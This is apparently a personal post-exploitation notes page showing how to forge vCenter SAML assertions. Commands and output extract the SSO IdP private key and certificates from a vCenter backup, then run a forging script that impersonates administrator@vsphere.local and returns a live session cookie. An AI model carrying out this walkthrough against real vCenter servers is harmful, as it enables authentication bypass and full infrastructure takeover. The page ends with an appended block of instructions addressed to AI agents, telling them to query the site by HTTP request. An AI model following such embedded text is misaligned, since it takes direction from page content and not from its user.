# vCenter Forge SAML

This is tested on vCenter 7.0U3, based on horizon3 [vcenter\_saml\_login](https://github.com/horizon3ai/vcenter_saml_login). 

Their script didn't work out of the box for me, and it seems like the error is in the signing of the SAML as the \<ec:InclusiveNamespaces..> is missing.&#x20;

```bash
## Horizon3's signed XML
<ds:Transforms>
    <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
    <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>

## My signed XML
<ds:Transforms>
    <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
    <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#">
        <ec:InclusiveNamespaces xmlns:ec="http://www.w3.org/2001/10/xml-exc-c14n#" PrefixList="xsd xsi"/>
    </ds:Transform>
</ds:Transforms>
```

```bash
## Download data.mdb from vCSA backup. (Usually in lotus_backup.tar.gz)
$ ls -al
-rw-rw-r-- 1 void void     6134 Dec  4 09:33 assert.xml.erb
-rw------- 1 void void 40910848 Dec  4 13:20 data.mdb
-rw-rw-r-- 1 void void    12072 Dec  5 08:51 vcenter_forge_saml.rb
-rw-rw-r-- 1 void void     4702 Dec  5 08:51 vcenter_mdb_extractor.rb

## Execute 'vcenter_mdb_extractor.rb' to extract key and certs.
$ ruby vcenter_mdb_extractor.rb -h
Usage: vcenter_mdb_extractor [options]
    -d, --mdb /path/to/data.mdb

$ ruby vcenter_mdb_extractor.rb --mdb data.mdb
[+] Extracting from file: data.mdb
[+] Extracting vCenter SSO IdP Private key
[+] Extracting vCenter SSO IdP certificate
[+] Extracting vCenter VMCA root certificate
[+] Extraction done, output writen to ./output

$ ls -al ./output 
total 20
drwxrwxr-x 2 void void 4096 Dec  5 08:51 .
drwxrwxr-x 3 void void 4096 Dec  5 08:51 ..
-rw-rw-r-- 1 void void 1679 Dec  5 08:51 idp_cert.key
-rw-rw-r-- 1 void void 1318 Dec  5 08:51 idp_cert.pem
-rw-rw-r-- 1 void void 1468 Dec  5 08:51 vmca_cert.pem

## Execute 'vcenter_forge_saml.rb' to forge a SAML Request
$ ruby vcenter_forge_saml.rb -h
Usage: vcenter_forge_saml [options]
    -f, --fqdn <fqdn>                (Required) vCenter FQDN/Hostname
    -k, --key idp_cert.key           vCenter SSO IdP Private key. Default: ./output/idp_cert.key
    -c, --cert idp_cert.pem          vCenter SSO IdP certificate. Default: ./output/idp_cert.pem
    -v, --vmca vmca_cert.pem         vCenter VMCA root certificate. Default: ./output/vmca_cert.pem
    -u, --user username              vCenter Username to impersonate. Default: administrator
    -d, --domain domain              vCenter domain. Default: vsphere.local

$ ruby vcenter_forge_saml.rb --fqdn vcenter.target.local
Forgin SAML Request for 'administrator@vsphere.local' on 'vcenter.target.local'.
 [+] Validated FQDN: vcenter.target.local
 [+] Validated SSO IdP trusted certificate chain
 [+] Generated SAML response XML
 [+] Extracted RelayState: e044eb6b-d5d5-48f5-8843-4f83e5f48afe
 [+] Signed SAML assertion
 [+] Successfully authenticated to vSphere/vCenter!
 [+] Session cookie: VSPHERE-UI-JSESSIONID=84D394608A08CE9E11532F2B6A5BDB91; Path=/ui
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/post-exploit/vmware/vcenter-forge-saml.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.